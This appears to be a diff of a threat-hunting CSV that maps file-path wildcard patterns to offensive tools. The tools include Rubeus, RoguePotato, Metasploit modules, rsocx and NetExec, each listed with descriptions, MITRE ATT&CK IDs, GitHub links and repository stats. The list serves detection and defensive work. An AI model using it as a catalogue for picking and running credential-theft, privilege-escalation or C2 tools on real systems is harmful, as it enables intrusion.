T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1355","206","2023-10-04T08:58:38Z","2020-03-28T09:56:08Z" "*/rockyou.txt*","offensive_tool_keyword","AD exploitation cheat sheet","Crack the hash with Hashcat","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/rockyou.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and 
Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/rockyou.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*/rockyou.txt*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/RoguePotato.git*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","876","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" -"*/RogueWinRMdll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/RogueWinRMexe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/RoguePotato.git*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*/RogueWinRMdll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/RogueWinRMexe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/root/.mozilla/firefox/*.Exegol*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*/root/output/ratchatPT*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*/root/shellcode.c*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" 
@@ -5035,18 +5086,18 @@
 "*/root/viper/*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
 "*/root/viper/dist*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
 "*/rop_emporium*","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z"
-"*/ropbuffers.go*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1991","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z"
+"*/ropbuffers.go*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z"
 "*/ropfuscator*","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","1","N/A","N/A","4","375","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z"
-"*/rottenpotato*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*/rottenpotato*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*/rpcap-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/rpcap-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"*/rpcbomb.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*/rpcbomb.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*/rpc-grind.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/rpcinfo.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/rpcrt.py *","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/yuanLink/CVE-2022-26809","1","0","N/A","N/A","1","62","26","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z"
 "*/rpivot.git*","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","1","N/A","10","10","490","125","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z"
 "*/rsa-vuln-roca.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"*/rservices_from_users.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*/rservices_from_users.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*/rsocx-*-linux-x86-64.zip*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","1","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z"
 "*/rsocx-*-windows-x86-64.zip*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","1","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z"
 "*/rsocx.exe*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","1","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z"
@@ -5055,56 +5106,59 @@
 "*/rsync-list-modules.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/rtsp-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/rtsp-url-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"*/Rubeus*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
-"*/Rubeus/*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"*/Rubeus*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"*/Rubeus/*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
 "*/Rudrastra.git*","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","8","1","46","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z"
-"*/rulerforms.go*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1991","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z"
-"*/run/leet.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
-"*/run_as_psh.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*/rulerforms.go*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z"
+"*/run/leet.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*/run_as_psh.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*/RunasCs.cs*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","0","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z"
 "*/RunasCs.git*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z"
 "*/RunasCs.git*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z"
 "*/RunasCs.zip*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z"
+"*/runasppl.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
 "*/RunAsWinTcb.git*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z"
 "*/RunAsWinTcb.iml*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z"
-"*/runcalc.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*/runcalc.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
